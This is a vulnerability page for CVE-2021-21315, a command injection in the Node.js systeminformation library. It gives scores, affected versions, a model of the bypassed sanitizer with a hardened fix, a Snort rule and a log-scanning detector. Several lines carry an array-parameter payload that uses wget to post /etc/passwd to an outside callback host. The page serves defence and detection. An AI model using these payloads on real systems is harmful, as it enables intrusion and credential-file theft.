CVE-2021-21315
published 2021-02-16


Priority: P1 · 87 · high
CVSS 3.1: 7.8 (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (remediation due 2022-02-01)
Exploited in the wild
EPSS: 90.24% (99.8th percentile)
The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability: several functions pass a caller-supplied service, process or host parameter into a shell command, and the string sanitization applied to that parameter is bypassed when an array is supplied instead of a string. The problem was fixed in version 5.3.1. As a workaround instead of upgrading, check or sanitize the parameters passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() and related functions: allow only strings and reject any arrays. String sanitization works as expected.
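The following is an added illustration of the bug class described above; it is not the systeminformation library's source. It models a character-by-character shell-metacharacter filter (the kind of "string sanitation" the workaround text relies on) and shows why an array slips through it, then places the advisory's workaround next to it: accept strings only, reject arrays, and allow-list the characters a name may contain. The command shape, the metacharacter list and the sample inputs are assumptions for the example; commands are only built and returned, never executed.

```javascript
// Added example, not the library's code. Models the pre-5.3.1 bug class:
// a per-character shell filter that is bypassed by an array argument.

// Characters the filter strips (assumed list for this example)
const SHELL_META = new Set(['$', '`', '(', ')', '|', ';', '&', '<', '>', '\n', '\r']);

// Vulnerable pattern: walks the input by index instead of checking its type.
// For a string, s[i] is one character and the blacklist works.
// For an array, s[i] is a whole element, which never equals a single
// metacharacter, so the element is copied through untouched.
function sanitizeShellString(str) {
  const s = str || '';
  let result = '';
  for (let i = 0; i < s.length; i++) {
    const piece = s[i];
    if (piece !== undefined && !SHELL_META.has(piece)) {
      result += piece;
    }
  }
  return result;
}

// Vulnerable: trusts the filter, then interpolates into a shell command.
// The command shape is hypothetical and stands in for the service lookup.
function vulnerableServiceCommand(srv) {
  return `ps -ef | grep -i ${sanitizeShellString(srv)}`;
}

// Hardened, following the advisory workaround: strings only, arrays rejected,
// and an allow-list for the name instead of a blacklist of shell syntax.
const SERVICE_NAME = /^[A-Za-z0-9_.@+-]{1,128}$/;
function hardenedServiceCommand(srv) {
  if (typeof srv !== 'string' || Array.isArray(srv)) {
    throw new TypeError('service name must be a string, got ' +
      (Array.isArray(srv) ? 'array' : typeof srv));
  }
  if (!SERVICE_NAME.test(srv)) {
    throw new RangeError('service name contains characters outside the allow-list');
  }
  // With a validated name, child_process.execFile('ps', ['-ef']) plus
  // filtering in JavaScript avoids the shell entirely; the string form is
  // kept here so both versions return comparable values.
  return `ps -ef | grep -i ${srv}`;
}

// Constructed inputs: what an Express app (default "extended" query parser)
// hands the library for ?name=nginx$(id) versus ?name[]=$(...)
const FROM_NAME_STRING = 'nginx$(id)';
const FROM_NAME_ARRAY = ['$(wget --post-file /etc/passwd http://203.0.113.7)'];

function demo() {
  const out = {
    stringInput: vulnerableServiceCommand(FROM_NAME_STRING), // metacharacters stripped
    arrayInput: vulnerableServiceCommand(FROM_NAME_ARRAY),   // payload passes untouched
  };
  try {
    hardenedServiceCommand(FROM_NAME_ARRAY);
    out.hardenedArray = 'accepted';
  } catch (e) {
    out.hardenedArray = e.constructor.name; // TypeError: array rejected
  }
  return out;
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

Running the block shows the string input reduced to `nginxid` while the one-element array reaches the command line intact, which is exactly the distinction the workaround draws between string and array parameters.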

Affected (5 ranges)

Vendor             Product            Version range    Fixed in
apache             cordova
paloalto           pan-os
sebhildebrandt     systeminformation  < 5.3.1          5.3.1
systeminformation  systeminformation  < 5.3.1          5.3.1
systeminformation  systeminformation  >= 0 < 5.3.1     5.3.1

Detection & IOCs (extracted from sources)

URL: /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}}) ({{interactsh-url}} is the Nuclei template placeholder for the out-of-band callback host)
Path: /api/getServices
Snort rule (Emerging Threats):
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT NodeJS System Information Library Command Injection Attempt (CVE-2021-21315)"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/api/getServices?name"; fast_pattern; pcre:"/^(?:\x28|\x29|\x3c|\x3e|\x26|\x2a|\xe2|\x80|\x98|\x7c|\x3f|\x3b|\x5b|\x5d|\x5e|\x7e|\x21|\x2e|\xe2|\x80|\x9d|\x25|\x40|\x2f|\x5c|\x3a|\x2b|\x2c|\x60)/R"; content:"|3d|"; within:10; reference:cve,2021-21315; classtype:attempted-admin; sid:2034973; rev:3; metadata:attack_target Server, created_at 2022_01_25, cve CVE_2021_21315, deployment Perimeter, deployment Internal, confidence High, signature_severity Major, tag Exploit, tag CISA_KEV, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_08, mitre_tactic_id TA0008, mitre_tactic_name Lateral_Movement, mitre_technique_id T1210, mitre_technique_name Exploitation_Of_Remote_Services;)
  • Exploit requests use HTTP GET to /api/getServices with the 'name' parameter supplied as an array (e.g., name[]=...) containing shell metacharacters or subshell syntax such as $(...). The /api/getServices route belongs to the application used to demonstrate the bug, not to the library, which exposes no HTTP interface of its own; any application route that forwards a request parameter to the affected functions is exposed in the same way, under whatever path it uses.
  • The response body of a successful exploitation attempt contains the literal injected command string alongside the JSON keys 'name', 'running', and 'pids'
  • Successful exploit responses return HTTP 200 with Content-Type: application/json
  • The Emerging Threats Snort rule (SID 2034973) fires on a GET whose URI contains /api/getServices?name when the byte immediately after that string is one of the listed shell-special characters (parentheses, angle brackets, pipe, semicolon, square brackets and others) and an '=' (hex 3d) follows within 10 bytes. The pcre is anchored with /R at the end of the content match, so it is the opening bracket of name[] that satisfies it; the parameter value itself is not inspected, and a request using plain name=... does not match
  • Vulnerable functions that accept unsanitized parameters include si.inetLatency(), si.inetChecksite(), si.services(), and si.processLoad(); passing arrays instead of strings triggers the injection
  • The vulnerability is only exploitable in systeminformation versions prior to 5.3.1; version 5.3.1 and later are patched
  • Array-type inputs to the vulnerable functions are the trigger; string inputs with proper sanitization are safe, so detection logic should focus on array-style query parameters (e.g., name[])
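As an added detection example (not code from the page's sources or from the Emerging Threats ruleset), the block below re-implements the matching logic of SID 2034973 on a request URI and, beside it, the broader check the notes above recommend: flag any array-style query parameter (name[], name[0]) that carries shell syntax, regardless of the path. The access log lines are constructed; the callback host and client addresses are placeholders.

```javascript
// Added example, not the ruleset's or the library's code. Runs the logic of
// ET SID 2034973 and an array-parameter check over constructed log lines.

const SAMPLE_LOG = [ // constructed, Apache-style request lines
  '10.0.0.5 - - [25/Jan/2022:10:00:01 +0000] "GET /api/getServices?name=nginx HTTP/1.1" 200 87',
  '10.0.0.9 - - [25/Jan/2022:10:00:02 +0000] "GET /api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20http://203.0.113.7) HTTP/1.1" 200 187',
  '10.0.0.9 - - [25/Jan/2022:10:00:03 +0000] "GET /api/getServices?name[]=nginx HTTP/1.1" 200 87',
  '10.0.0.11 - - [25/Jan/2022:10:00:04 +0000] "GET /api/getServices?name%5B0%5D=%60id%60 HTTP/1.1" 200 91',
  '10.0.0.11 - - [25/Jan/2022:10:00:05 +0000] "GET /api/getServices?name=%24%28id%29 HTTP/1.1" 200 87',
];

// Byte values copied from the rule's pcre alternation (the \xe2 \x80 \x98 \x9d
// entries are the rule's per-byte spelling of curly quotes)
const ET_LEAD_BYTES = new Set([
  0x28, 0x29, 0x3c, 0x3e, 0x26, 0x2a, 0xe2, 0x80, 0x98, 0x7c, 0x3f, 0x3b, 0x5b,
  0x5d, 0x5e, 0x7e, 0x21, 0x2e, 0x9d, 0x25, 0x40, 0x2f, 0x5c, 0x3a, 0x2b, 0x2c, 0x60,
]);
const ET_PREFIX = Buffer.from('/api/getServices?name');

// Mirrors: http.method GET; http.uri content "/api/getServices?name";
// pcre "^(...)" with /R anchored right after it; content "=" within:10.
function etSid2034973(method, uri) {
  if (method !== 'GET') return false;
  // Snort's http.uri buffer is normalized (percent-decoded), so decode first
  let buf;
  try { buf = Buffer.from(decodeURIComponent(uri), 'utf8'); }
  catch { buf = Buffer.from(uri, 'utf8'); }
  const at = buf.indexOf(ET_PREFIX);
  if (at < 0) return false;
  const pos = at + ET_PREFIX.length;       // pcre "^" anchors here
  if (pos >= buf.length || !ET_LEAD_BYTES.has(buf[pos])) return false;
  // '=' must start within the 10 bytes following the pcre match
  return buf.subarray(pos + 1, pos + 11).indexOf(0x3d) !== -1;
}

// Broader check: array-style keys whose value carries shell syntax
const ARRAY_KEY = /\[\d*\]$/;
const SHELL_SYNTAX = /[$`|;&<>]/;

function arrayParamFindings(uri) {
  const u = new URL(uri, 'http://placeholder.invalid'); // base is a dummy
  const findings = [];
  for (const [key, value] of u.searchParams) {
    if (!ARRAY_KEY.test(key)) continue;
    findings.push({ key, value, shellSyntax: SHELL_SYNTAX.test(value) });
  }
  return findings;
}

const REQUEST_LINE = /"(GET|POST|PUT|DELETE|HEAD) (\S+) HTTP\/[\d.]+"/;

function classifyRequest(line) {
  const m = REQUEST_LINE.exec(line);
  if (!m) return null;
  const [, method, uri] = m;
  const findings = arrayParamFindings(uri);
  return {
    method,
    uri,
    etMatch: etSid2034973(method, uri),
    arrayParams: findings.map((f) => f.key),
    injectedArrayParams: findings.filter((f) => f.shellSyntax).map((f) => f.key),
  };
}

function scan(lines) {
  return lines.map(classifyRequest).filter(Boolean);
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(scan(SAMPLE_LOG));
}
```

Two properties of the rule show up in the results: a benign name[]=nginx fires it just as the payload does, because only the bracket after ?name is examined, and name=$(id) does not fire at all (the '=' is not in the alternation), which is acceptable only because a string parameter reaches the library's sanitizer. The array-parameter check is the one to carry over to applications that expose the affected functions under a different path.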

CVSS provenance

Source     Version  Score  Severity  Vector
nvd        v3.1     7.8    HIGH      CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
nvd        v2.0     4.6    MEDIUM    AV:L/AC:L/Au:N/C:P/I:P/A:P
vulncheck           7.1    HIGH
cisa                7.8    HIGH

Both NVD vectors rate the attack vector as Local (AV:L), which describes calling the library's functions directly. When an application forwards request parameters to those functions, as the exploit URL and Snort rule above assume, the effective attack vector is the network, so the NVD scores understate the exposure of such deployments.